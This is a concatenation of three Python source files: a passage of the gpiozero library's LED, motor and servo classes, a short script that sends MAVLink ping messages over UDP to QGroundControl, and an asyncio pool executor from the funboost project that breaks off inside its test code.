def mid_tone(self):
"""
The middle tone available, i.e. the tone played when :attr:`value` is
0.
"""
return self._mid_tone
@property
def max_tone(self):
"""
The highest tone that the buzzer can play, i.e. the tone played when
:attr:`value` is 1.
"""
return self._mid_tone.up(12 * self.octaves)
class PWMLED(PWMOutputDevice):
"""
Extends :class:`PWMOutputDevice` and represents a light emitting diode
(LED) with variable brightness.
A typical configuration of such a device is to connect a GPIO pin to the
anode (long leg) of the LED, and the cathode (short leg) to ground, with
an optional resistor to prevent the LED from burning out.
:type pin: int or str
:param pin:
The GPIO pin which the LED is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:param float initial_value:
If ``0`` (the default), the LED will be off initially. Other values
between 0 and 1 can be specified as an initial brightness for the LED.
Note that :data:`None` cannot be specified (unlike the parent class) as
there is no way to tell PWM not to alter the state of the pin.
:param int frequency:
The frequency (in Hz) of pulses emitted to drive the LED. Defaults
to 100Hz.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
PWMLED.is_lit = PWMLED.is_active
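# Illustrative usage sketch (not part of the library source): unlike LED, a
# PWMLED accepts fractional brightness values and can fade smoothly, e.g.:
#
#     from gpiozero import PWMLED
#     led = PWMLED(17)   # hypothetical pin choice
#     led.value = 0.5    # half brightness
#     led.pulse()        # fade in and out repeatedly in the background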
class RGBLED(SourceMixin, Device):
"""
Extends :class:`Device` and represents a full color LED component (composed
of red, green, and blue LEDs).
Connect the common cathode (longest leg) to a ground pin; connect each of
the other legs (representing the red, green, and blue anodes) to any GPIO
pins. You should use three limiting resistors (one per anode).
The following code will make the LED yellow::
from gpiozero import RGBLED
led = RGBLED(2, 3, 4)
led.color = (1, 1, 0)
The `colorzero`_ library is also supported::
from gpiozero import RGBLED
from colorzero import Color
led = RGBLED(2, 3, 4)
led.color = Color('yellow')
:type red: int or str
:param red:
The GPIO pin that controls the red component of the RGB LED. See
:ref:`pin-numbering` for valid pin numbers. If this is :data:`None` a
:exc:`GPIODeviceError` will be raised.
:type green: int or str
:param green:
The GPIO pin that controls the green component of the RGB LED.
:type blue: int or str
:param blue:
The GPIO pin that controls the blue component of the RGB LED.
:param bool active_high:
Set to :data:`True` (the default) for common cathode RGB LEDs. If you
are using a common anode RGB LED, set this to :data:`False`.
:type initial_value: ~colorzero.Color or tuple
:param initial_value:
The initial color for the RGB LED. Defaults to black ``(0, 0, 0)``.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMLED` instances for
each component of the RGBLED. If :data:`False`, construct regular
:class:`LED` instances, which prevents smooth color graduations.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
.. _colorzero: https://colorzero.readthedocs.io/
"""
def __init__(
self, red=None, green=None, blue=None, active_high=True,
initial_value=(0, 0, 0), pwm=True, pin_factory=None):
self._leds = ()
self._blink_thread = None
if not all(p is not None for p in [red, green, blue]):
raise GPIOPinMissing('red, green, and blue pins must be provided')
LEDClass = PWMLED if pwm else LED
super(RGBLED, self).__init__(pin_factory=pin_factory)
self._leds = tuple(
LEDClass(pin, active_high, pin_factory=pin_factory)
for pin in (red, green, blue)
)
self.value = initial_value
def close(self):
if getattr(self, '_leds', None):
self._stop_blink()
for led in self._leds:
led.close()
self._leds = ()
super(RGBLED, self).close()
@property
def closed(self):
return len(self._leds) == 0
@property
def value(self):
"""
Represents the color of the LED as an RGB 3-tuple of ``(red, green,
blue)`` where each value is between 0 and 1 if *pwm* was :data:`True`
when the class was constructed (and only 0 or 1 if not).
For example, red would be ``(1, 0, 0)`` and yellow would be ``(1, 1,
0)``, while orange would be ``(1, 0.5, 0)``.
"""
return tuple(led.value for led in self._leds)
@value.setter
def value(self, value):
for component in value:
if not 0 <= component <= 1:
raise OutputDeviceBadValue(
'each RGB color component must be between 0 and 1')
if isinstance(self._leds[0], LED):
if component not in (0, 1):
raise OutputDeviceBadValue(
'each RGB color component must be 0 or 1 with non-PWM '
'RGBLEDs')
self._stop_blink()
for led, v in zip(self._leds, value):
led.value = v
@property
def is_active(self):
"""
Returns :data:`True` if the LED is currently active (not black) and
:data:`False` otherwise.
"""
return self.value != (0, 0, 0)
is_lit = is_active
@property
def color(self):
"""
Represents the color of the LED as a :class:`~colorzero.Color` object.
"""
return Color(*self.value)
@color.setter
def color(self, value):
self.value = value
@property
def red(self):
"""
Represents the red element of the LED as a :class:`~colorzero.Red`
object.
"""
return self.color.red
@red.setter
def red(self, value):
self._stop_blink()
r, g, b = self.value
self.value = value, g, b
@property
def green(self):
"""
Represents the green element of the LED as a :class:`~colorzero.Green`
object.
"""
return self.color.green
@green.setter
def green(self, value):
self._stop_blink()
r, g, b = self.value
self.value = r, value, b
@property
def blue(self):
"""
Represents the blue element of the LED as a :class:`~colorzero.Blue`
object.
"""
return self.color.blue
@blue.setter
def blue(self, value):
self._stop_blink()
r, g, b = self.value
self.value = r, g, value
def on(self):
"""
        Turn the LED on. This is equivalent to setting the LED color to white
``(1, 1, 1)``.
"""
self.value = (1, 1, 1)
def off(self):
"""
Turn the LED off. This is equivalent to setting the LED color to black
``(0, 0, 0)``.
"""
self.value = (0, 0, 0)
def toggle(self):
"""
Toggle the state of the device. If the device is currently off
(:attr:`value` is ``(0, 0, 0)``), this changes it to "fully" on
(:attr:`value` is ``(1, 1, 1)``). If the device has a specific color,
this method inverts the color.
"""
r, g, b = self.value
self.value = (1 - r, 1 - g, 1 - b)
def blink(
self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0,
on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 0. Must be 0 if
*pwm* was :data:`False` when the class was constructed
(:exc:`ValueError` will be raised if not).
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 0. Must be 0 if
*pwm* was :data:`False` when the class was constructed
(:exc:`ValueError` will be raised if not).
:type on_color: ~colorzero.Color or tuple
:param on_color:
The color to use when the LED is "on". Defaults to white.
:type off_color: ~colorzero.Color or tuple
:param off_color:
The color to use when the LED is "off". Defaults to black.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
if isinstance(self._leds[0], LED):
if fade_in_time:
raise ValueError('fade_in_time must be 0 with non-PWM RGBLEDs')
if fade_out_time:
raise ValueError('fade_out_time must be 0 with non-PWM RGBLEDs')
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device,
args=(
on_time, off_time, fade_in_time, fade_out_time,
on_color, off_color, n
)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def pulse(
self, fade_in_time=1, fade_out_time=1,
on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True):
"""
Make the device fade in and out repeatedly.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 1.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 1.
:type on_color: ~colorzero.Color or tuple
:param on_color:
The color to use when the LED is "on". Defaults to white.
:type off_color: ~colorzero.Color or tuple
:param off_color:
The color to use when the LED is "off". Defaults to black.
:type n: int or None
:param n:
Number of times to pulse; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue pulsing and return immediately. If :data:`False`, only
return when the pulse is finished (warning: the default value of
*n* will result in this method never returning).
"""
on_time = off_time = 0
self.blink(
on_time, off_time, fade_in_time, fade_out_time,
on_color, off_color, n, background
)
def _stop_blink(self, led=None):
# If this is called with a single led, we stop all blinking anyway
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(
self, on_time, off_time, fade_in_time, fade_out_time, on_color,
off_color, n, fps=25):
# Define a simple lambda to perform linear interpolation between
# off_color and on_color
lerp = lambda t, fade_in: tuple(
(1 - t) * off + t * on
if fade_in else
(1 - t) * on + t * off
for off, on in zip(off_color, on_color)
)
sequence = []
if fade_in_time > 0:
sequence += [
(lerp(i * (1 / fps) / fade_in_time, True), 1 / fps)
for i in range(int(fps * fade_in_time))
]
sequence.append((on_color, on_time))
if fade_out_time > 0:
sequence += [
(lerp(i * (1 / fps) / fade_out_time, False), 1 / fps)
for i in range(int(fps * fade_out_time))
]
sequence.append((off_color, off_time))
sequence = (
cycle(sequence) if n is None else
chain.from_iterable(repeat(sequence, n))
)
for l in self._leds:
l._controller = self
for value, delay in sequence:
for l, v in zip(self._leds, value):
l._write(v)
if self._blink_thread.stopping.wait(delay):
break
class Motor(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a generic motor
connected to a bi-directional motor driver circuit (i.e. an `H-bridge`_).
Attach an `H-bridge`_ motor controller to your Pi; connect a power source
(e.g. a battery pack or the 5V pin) to the controller; connect the outputs
of the controller board to the two terminals of the motor; connect the
inputs of the controller board to two GPIO pins.
.. _H-bridge: https://en.wikipedia.org/wiki/H_bridge
The following code will make the motor turn "forwards"::
from gpiozero import Motor
motor = Motor(17, 18)
motor.forward()
:type forward: int or str
:param forward:
The GPIO pin that the forward input of the motor driver chip is
connected to. See :ref:`pin-numbering` for valid pin numbers. If this
is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type backward: int or str
:param backward:
The GPIO pin that the backward input of the motor driver chip is
connected to. See :ref:`pin-numbering` for valid pin numbers. If this
is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type enable: int or str or None
:param enable:
The GPIO pin that enables the motor. Required for *some* motor
controller boards. See :ref:`pin-numbering` for valid pin numbers.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMOutputDevice`
instances for the motor controller pins, allowing both direction and
variable speed control. If :data:`False`, construct
:class:`DigitalOutputDevice` instances, allowing only direction
control.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(self, forward=None, backward=None, enable=None, pwm=True,
pin_factory=None):
if not all(p is not None for p in [forward, backward]):
raise GPIOPinMissing(
'forward and backward pins must be provided'
)
PinClass = PWMOutputDevice if pwm else DigitalOutputDevice
devices = OrderedDict((
('forward_device', PinClass(forward)),
('backward_device', PinClass(backward)),
))
if enable is not None:
devices['enable_device'] = DigitalOutputDevice(enable,
initial_value=True)
super(Motor, self).__init__(_order=devices.keys(), **devices)
@property
def value(self):
"""
Represents the speed of the motor as a floating point value between -1
(full speed backward) and 1 (full speed forward), with 0 representing
stopped.
"""
return self.forward_device.value - self.backward_device.value
@value.setter
def value(self, value):
if not -1 <= value <= 1:
raise OutputDeviceBadValue("Motor value must be between -1 and 1")
if value > 0:
try:
self.forward(value)
except ValueError as e:
raise OutputDeviceBadValue(e)
elif value < 0:
try:
self.backward(-value)
except ValueError as e:
raise OutputDeviceBadValue(e)
else:
self.stop()
@property
def is_active(self):
"""
Returns :data:`True` if the motor is currently running and
:data:`False` otherwise.
"""
return self.value != 0
def forward(self, speed=1):
"""
Drive the motor forwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed) if *pwm* was
:data:`True` when the class was constructed (and only 0 or 1 if
not).
"""
if not 0 <= speed <= 1:
raise ValueError('forward speed must be between 0 and 1')
if isinstance(self.forward_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'forward speed must be 0 or 1 with non-PWM Motors')
self.backward_device.off()
self.forward_device.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed) if *pwm* was
:data:`True` when the class was constructed (and only 0 or 1 if
not).
"""
if not 0 <= speed <= 1:
raise ValueError('backward speed must be between 0 and 1')
if isinstance(self.backward_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'backward speed must be 0 or 1 with non-PWM Motors')
self.forward_device.off()
self.backward_device.value = speed
def reverse(self):
"""
Reverse the current direction of the motor. If the motor is currently
idle this does nothing. Otherwise, the motor's direction will be
reversed at the current speed.
"""
self.value = -self.value
def stop(self):
"""
Stop the motor.
"""
self.forward_device.off()
self.backward_device.off()
class PhaseEnableMotor(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a generic motor connected
to a Phase/Enable motor driver circuit; the phase of the driver controls
whether the motor turns forwards or backwards, while enable controls the
speed with PWM.
The following code will make the motor turn "forwards"::
from gpiozero import PhaseEnableMotor
motor = PhaseEnableMotor(12, 5)
motor.forward()
:type phase: int or str
:param phase:
The GPIO pin that the phase (direction) input of the motor driver chip
is connected to. See :ref:`pin-numbering` for valid pin numbers. If
this is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type enable: int or str
:param enable:
The GPIO pin that the enable (speed) input of the motor driver chip
is connected to. See :ref:`pin-numbering` for valid pin numbers. If
this is :data:`None` a :exc:`GPIODeviceError` will be raised.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMOutputDevice`
instances for the motor controller pins, allowing both direction and
variable speed control. If :data:`False`, construct
:class:`DigitalOutputDevice` instances, allowing only direction
control.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(self, phase=None, enable=None, pwm=True, pin_factory=None):
if not all([phase, enable]):
raise GPIOPinMissing('phase and enable pins must be provided')
PinClass = PWMOutputDevice if pwm else DigitalOutputDevice
super(PhaseEnableMotor, self).__init__(
phase_device=DigitalOutputDevice(phase, pin_factory=pin_factory),
enable_device=PinClass(enable, pin_factory=pin_factory),
_order=('phase_device', 'enable_device'),
pin_factory=pin_factory
)
@property
def value(self):
"""
Represents the speed of the motor as a floating point value between -1
(full speed backward) and 1 (full speed forward).
"""
return (
-self.enable_device.value
if self.phase_device.is_active else
self.enable_device.value
)
@value.setter
def value(self, value):
if not -1 <= value <= 1:
raise OutputDeviceBadValue("Motor value must be between -1 and 1")
if value > 0:
self.forward(value)
elif value < 0:
self.backward(-value)
else:
self.stop()
@property
def is_active(self):
"""
Returns :data:`True` if the motor is currently running and
:data:`False` otherwise.
"""
return self.value != 0
def forward(self, speed=1):
"""
Drive the motor forwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed).
"""
if isinstance(self.enable_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'forward speed must be 0 or 1 with non-PWM Motors')
self.enable_device.off()
self.phase_device.off()
self.enable_device.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed).
"""
if isinstance(self.enable_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'backward speed must be 0 or 1 with non-PWM Motors')
self.enable_device.off()
self.phase_device.on()
self.enable_device.value = speed
def reverse(self):
"""
Reverse the current direction of the motor. If the motor is currently
idle this does nothing. Otherwise, the motor's direction will be
reversed at the current speed.
"""
self.value = -self.value
def stop(self):
"""
Stop the motor.
"""
self.enable_device.off()
class Servo(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a PWM-controlled servo
motor connected to a GPIO pin.
Connect a power source (e.g. a battery pack or the 5V pin) to the power
cable of the servo (this is typically colored red); connect the ground
cable of the servo (typically colored black or brown) to the negative of
your battery pack, or a GND pin; connect the final cable (typically colored
white or orange) to the GPIO pin you wish to use for controlling the servo.
The following code will make the servo move between its minimum, maximum,
and mid-point positions with a pause between each::
from gpiozero import Servo
from time import sleep
servo = Servo(17)
while True:
servo.min()
sleep(1)
servo.mid()
sleep(1)
servo.max()
sleep(1)
:type pin: int or str
:param pin:
The GPIO pin that the servo is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_value:
If ``0`` (the default), the device's mid-point will be set initially.
Other values between -1 and +1 can be specified as an initial position.
:data:`None` means to start the servo un-controlled (see
:attr:`value`).
:param float min_pulse_width:
The pulse width corresponding to the servo's minimum position. This
defaults to 1ms.
:param float max_pulse_width:
The pulse width corresponding to the servo's maximum position. This
defaults to 2ms.
:param float frame_width:
The length of time between servo control pulses measured in seconds.
This defaults to 20ms which is a common value for servos.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, initial_value=0.0,
min_pulse_width=1/1000, max_pulse_width=2/1000,
frame_width=20/1000, pin_factory=None):
if min_pulse_width >= max_pulse_width:
raise ValueError('min_pulse_width must be less than max_pulse_width')
if max_pulse_width >= frame_width:
raise ValueError('max_pulse_width must be less than frame_width')
self._frame_width = frame_width
self._min_dc = min_pulse_width / frame_width
self._dc_range = (max_pulse_width - min_pulse_width) / frame_width
self._min_value = -1
self._value_range = 2
super(Servo, self).__init__(
pwm_device=PWMOutputDevice(
pin, frequency=int(1 / frame_width), pin_factory=pin_factory
),
pin_factory=pin_factory
)
try:
self.value = initial_value
except:
self.close()
raise
@property
def frame_width(self):
"""
The time between control pulses, measured in seconds.
"""
return self._frame_width
@property
def min_pulse_width(self):
"""
The control pulse width corresponding to the servo's minimum position,
measured in seconds.
"""
return self._min_dc * self.frame_width
@property
def max_pulse_width(self):
"""
The control pulse width corresponding to the servo's maximum position,
measured in seconds.
"""
return (self._dc_range * self.frame_width) + self.min_pulse_width
@property
def pulse_width(self):
"""
Returns the current pulse width controlling the servo.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
return self.pwm_device.pin.state * self.frame_width
def min(self):
"""
Set the servo to its minimum position.
"""
self.value = -1
def mid(self):
"""
Set the servo to its mid-point position.
"""
self.value = 0
def max(self):
"""
Set the servo to its maximum position.
"""
self.value = 1
def detach(self):
"""
Temporarily disable control of the servo. This is equivalent to
setting :attr:`value` to :data:`None`.
"""
self.value = None
def _get_value(self):
if self.pwm_device.pin.frequency is None:
return None
else:
return (
((self.pwm_device.pin.state - self._min_dc) / self._dc_range) *
self._value_range + self._min_value)
@property
def value(self):
"""
Represents the position of the servo as a value between -1 (the minimum
position) and +1 (the maximum position). This can also be the special
value :data:`None` indicating that the servo is currently
"uncontrolled", i.e. that no control signal is being sent. Typically
this means the servo's position remains unchanged, but that it can be
moved by hand.
"""
result = self._get_value()
if result is None:
return result
else:
# NOTE: This round() only exists to ensure we don't confuse people
# by returning 2.220446049250313e-16 as the default initial value
# instead of 0. The reason _get_value and _set_value are split
            # out is for descendants that require the un-rounded values for
# accuracy
return round(result, 14)
@value.setter
def value(self, value):
if value is None:
self.pwm_device.pin.frequency = None
elif -1 <= value <= 1:
self.pwm_device.pin.frequency = int(1 / self.frame_width)
self.pwm_device.pin.state = (
self._min_dc + self._dc_range *
((value - self._min_value) / self._value_range)
)
else:
raise OutputDeviceBadValue(
"Servo value must be between -1 and 1, or None")
@property
def is_active(self):
return self.value is not None
class AngularServo(Servo):
"""
Extends :class:`Servo` and represents a rotational PWM-controlled servo
motor which can be set to particular angles (assuming valid minimum and
maximum angles are provided to the constructor).
Connect a power source (e.g. a battery pack or the 5V pin) to the power
cable of the servo (this is typically colored red); connect the ground
cable of the servo (typically colored black or brown) to the negative of
your battery pack, or a GND pin; connect the final cable (typically colored
white or orange) to the GPIO pin you wish to use for controlling the servo.
Next, calibrate the angles that the servo can rotate to. In an interactive
Python session, construct a :class:`Servo` instance. The servo should move
to its mid-point by default. Set the servo to its minimum value, and
measure the angle from the mid-point. Set the servo to its maximum value,
and again measure the angle::
>>> from gpiozero import Servo
>>> s = Servo(17)
>>> s.min() # measure the angle
>>> s.max() # measure the angle
You should now be able to construct an :class:`AngularServo` instance
with the correct bounds::
>>> from gpiozero import AngularServo
>>> s = AngularServo(17, min_angle=-42, max_angle=44)
>>> s.angle = 0.0
>>> s.angle
0.0
>>> s.angle = 15
>>> s.angle
15.0
.. note::
You can set *min_angle* greater than *max_angle* if you wish to reverse
the sense of the angles (e.g. ``min_angle=45, max_angle=-45``). This
can be useful with servos that rotate in the opposite direction to your
expectations of minimum and maximum.
:type pin: int or str
:param pin:
The GPIO pin that the servo is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_angle:
Sets the servo's initial angle to the specified value. The default is
0. The value specified must be between *min_angle* and *max_angle*
inclusive. :data:`None` means to start the servo un-controlled (see
:attr:`value`).
:param float min_angle:
Sets the minimum angle that the servo can rotate to. This defaults to
-90, but should be set to whatever you measure from your servo during
calibration.
:param float max_angle:
Sets the maximum angle that the servo can rotate to. This defaults to
90, but should be set to whatever you measure from your servo during
calibration.
:param float min_pulse_width:
The pulse width corresponding to the servo's minimum position. This
defaults to 1ms.
:param float max_pulse_width:
The pulse width corresponding to the servo's maximum position. This
defaults to 2ms.
:param float frame_width:
The length of time between servo control pulses measured in seconds.
This defaults to 20ms which is a common value for servos.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, initial_angle=0.0,
min_angle=-90, max_angle=90,
min_pulse_width=1/1000, max_pulse_width=2/1000,
frame_width=20/1000, pin_factory=None):
self._min_angle = min_angle
self._angular_range = max_angle - min_angle
if initial_angle is None:
initial_value = None
elif ((min_angle <= initial_angle <= max_angle) or
(max_angle <= initial_angle <= min_angle)):
initial_value = 2 * ((initial_angle - min_angle) / self._angular_range) - 1
else:
raise OutputDeviceBadValue(
"AngularServo angle must be between %s and %s, or None" %
(min_angle, max_angle))
super(AngularServo, self).__init__(
pin, initial_value, min_pulse_width, max_pulse_width, frame_width,
pin_factory=pin_factory
)
@property
def min_angle(self):
"""
The minimum angle that the servo will rotate to when :meth:`min` is
called.
"""
return self._min_angle
@property
def max_angle(self):
"""
The maximum angle that the servo will rotate to when :meth:`max` is
called.
"""
return self._min_angle + self._angular_range
@property
def angle(self):
"""
The position of the servo as an angle measured in degrees. This will
only be accurate if :attr:`min_angle` and :attr:`max_angle` have been
set appropriately in the constructor.
This can also be the special value :data:`None` indicating that the
servo is currently "uncontrolled", i.e. that no control signal is being
sent. Typically this means the servo's position remains unchanged, but
that it can be moved by hand.
"""
result = self._get_value()
if result is None:
return None
else:
# NOTE: Why round(n, 12) here instead of 14? Angle ranges can be
# much larger than -1..1 so we need a little more rounding to
# smooth off the rough corners!
return round(
self._angular_range *
((result - self._min_value) / self._value_range) +
self._min_angle, 12)
@angle.setter
def angle(self, angle):
if angle is None:
self.value = None
elif ((self.min_angle <= angle <= self.max_angle) or
(self.max_angle <= angle <= self.min_angle)):
self.value = (
self._value_range *
((angle - self._min_angle) / self._angular_range) +
self._min_value)
else:
raise OutputDeviceBadValue(
"AngularServo angle must be between %s and %s, or None" %
(self.min_angle, self.max_angle))
|
sender.py
|
#!/usr/bin/python
# Test sending MAVLink messages over UDP
from __future__ import print_function
from threading import Thread
from time import sleep
import pymavlink.mavutil as mavutil
import sys
import time
UDP = "192.168.192.101:14550" # The IP and port of QGroundcontrol. It can't be a broadcast IP.
SOURCE_SYSTEM_ID = 99 # Me, the sender
TARGET_SYSTEM_ID = 255 # QGroundcontrol
mav = mavutil.mavlink_connection('udpout:' + UDP, source_system=SOURCE_SYSTEM_ID)
def pingloop():
i = 0
while (True):
msg = mav.mav.ping_send(int(time.time() * 1000000), i, TARGET_SYSTEM_ID, 1) # PING's first field is time_usec, i.e. microseconds
i = i + 1
sleep(1)
pingthread = Thread(target=pingloop)
pingthread.daemon = True
pingthread.start()
while (True):
msg = mav.recv_match(blocking=True)
print("Message from %d: %s" % (msg.get_srcSystem(), msg))
|
async_pool_executor.py
|
import atexit
import asyncio
import threading
import time
import traceback
from threading import Thread
import nb_log # noqa
# if os.name == 'posix':
# import uvloop
#
# asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) # monkey-patching is best done at the top of the module, otherwise it is very likely to cause problems.
"""
# The async pool could also be implemented with janus's thread-safe queue; its produce/consume performance is no better than this module's own implementation, so it is not re-implemented with that package here.
import janus
import asyncio
import time
import threading
import nb_log
queue = janus.Queue(maxsize=6000)
async def consume():
while 1:
# time.sleep(1)
val = await queue.async_q.get() # this is the async side, don't mix it up
print(val)
def push():
for i in range(50000):
# time.sleep(0.2)
# print(i)
queue.sync_q.put(i) # this is the sync side, don't mix it up
if __name__ == '__main__':
threading.Thread(target=push).start()
loop = asyncio.get_event_loop()
loop.create_task(consume())
loop.run_forever()
"""
class AsyncPoolExecutor2:
def __init__(self, size, loop=None):
self._size = size
self.loop = loop or asyncio.new_event_loop()
self._sem = asyncio.Semaphore(self._size, loop=self.loop)
# atexit.register(self.shutdown)
Thread(target=self._start_loop_in_new_thread).start()
def submit(self, func, *args, **kwargs):
while self._sem.locked():
time.sleep(0.001)
asyncio.run_coroutine_threadsafe(self._run_func(func, *args, **kwargs), self.loop)
async def _run_func(self, func, *args, **kwargs):
async with self._sem:
result = await func(*args, **kwargs)
return result
def _start_loop_in_new_thread(self, ):
self.loop.run_forever()
def shutdown(self):
self.loop.stop()
self.loop.close()
class AsyncPoolExecutor(nb_log.LoggerMixin):
"""
Makes the API behave like a thread pool. The best-performing approach would be to make submit an async def as well, so production and consumption run in the same thread on the same loop, but that would break compatibility of the call chain and the calling style would no longer match a thread pool.
"""
def __init__(self, size, loop=None):
"""
:param size: number of coroutine tasks run concurrently.
:param loop:
"""
self._size = size
self.loop = loop or asyncio.new_event_loop()
self._sem = asyncio.Semaphore(self._size, loop=self.loop)
self._queue = asyncio.Queue(maxsize=size, loop=self.loop)
self._lock = threading.Lock()
t = Thread(target=self._start_loop_in_new_thread)
t.setDaemon(True) # daemon thread so atexit has a chance to fire and the program exits automatically without a manual shutdown() call
t.start()
self._can_be_closed_flag = False
atexit.register(self.shutdown)
self._event = threading.Event()
# print(self._event.is_set())
self._event.set()
def submit000(self, func, *args, **kwargs):
# More than 3x faster than the run_coroutine_threadsafe + result approach below.
with self._lock:
while 1:
if not self._queue.full():
self.loop.call_soon_threadsafe(self._queue.put_nowait, (func, args, kwargs))
break
else:
time.sleep(0.01)
def submit(self, func, *args, **kwargs):
future = asyncio.run_coroutine_threadsafe(self._produce(func, *args, **kwargs), self.loop) # run_coroutine_threadsafe also has a drawback: it is quite expensive.
future.result() # prevent submitting too fast; once the queue is full, submit blocks.
async def _produce(self, func, *args, **kwargs):
await self._queue.put((func, args, kwargs))
async def _consume(self):
while True:
func, args, kwargs = await self._queue.get()
if isinstance(func, str) and func.startswith('stop'):
# self.logger.debug(func)
break
# noinspection PyBroadException,PyUnusedLocal
try:
await func(*args, **kwargs)
except Exception as e:
traceback.print_exc()
# self._queue.task_done()
async def __run(self):
for _ in range(self._size):
asyncio.ensure_future(self._consume())
def _start_loop_in_new_thread(self, ):
# self._loop.run_until_complete(self.__run()) # this also works.
# self._loop.run_forever()
# asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(asyncio.wait([self._consume() for _ in range(self._size)], loop=self.loop))
self._can_be_closed_flag = True
def shutdown(self):
if self.loop.is_running(): # may be triggered by atexit or called manually by the user, so check first to avoid closing the loop twice.
for i in range(self._size):
self.submit(f'stop{i}', )
while not self._can_be_closed_flag:
time.sleep(0.1)
self.loop.stop()
self.loop.close()
print('event loop closed')
class AsyncProducerConsumer:
"""
See the official docs at https://asyncio.readthedocs.io/en/latest/producer_consumer.html
A simple producer/consumer example, using an asyncio.Queue:
"""
"""
Produce and consume at the same time. This framework does not use this class: it requires producing and consuming in the same thread, which makes it inconvenient to retrofit onto the existing synchronous framework code.
"""
def __init__(self, items, concurrent_num=200, consume_fun_specify=None):
"""
:param items: the list of items (arguments) to consume
:param concurrent_num: number of concurrent consumers
:param consume_fun_specify: the async consumer function to use; if not given, subclass this class and override consume_fun.
"""
self.queue = asyncio.Queue()
self.items = items
self._concurrent_num = concurrent_num
self.consume_fun_specify = consume_fun_specify
async def produce(self):
for item in self.items:
await self.queue.put(item)
async def consume(self):
while True:
# wait for an item from the producer
item = await self.queue.get()
# process the item
# print('consuming {}...'.format(item))
# simulate i/o operation using sleep
try:
if self.consume_fun_specify:
await self.consume_fun_specify(item)
else:
await self.consume_fun(item)
except Exception as e:
print(e)
# Notify the queue that the item has been processed
self.queue.task_done()
@staticmethod
async def consume_fun(item):
"""
Either subclass this class and override this method, or pass an async function as consume_fun_specify when constructing the class.
:param item:
:return:
"""
print(item, 'please override the consume_fun method')
await asyncio.sleep(1)
async def __run(self):
# schedule the consumer
tasks = []
for _ in range(self._concurrent_num):
task = asyncio.ensure_future(self.consume())
tasks.append(task)
# run the producer and wait for completion
await self.produce()
# wait until the consumer has processed all items
await self.queue.join()
# the consumer is still awaiting for an item, cancel it
for task in tasks:
task.cancel()
def start_run(self):
loop = asyncio.get_event_loop()
loop.run_until_complete(self.__run())
# loop.close()
if __name__ == '__main__':
def test_async_pool_executor():
from funboost.concurrent_pool import CustomThreadPoolExecutor as ThreadPoolExecutor
# from concurrent.futures.thread import ThreadPoolExecutor
# noinspection PyUnusedLocal
async def f(x):
# await asyncio.sleep(0.1)
pass
print('printing', x)
# await asyncio.sleep(1)
# raise Exception('aaa')
def f2(x):
pass
# time.sleep(0.001)
print('printing', x)
print(1111)
t1 = time.time()
# pool = AsyncPoolExecutor(200)
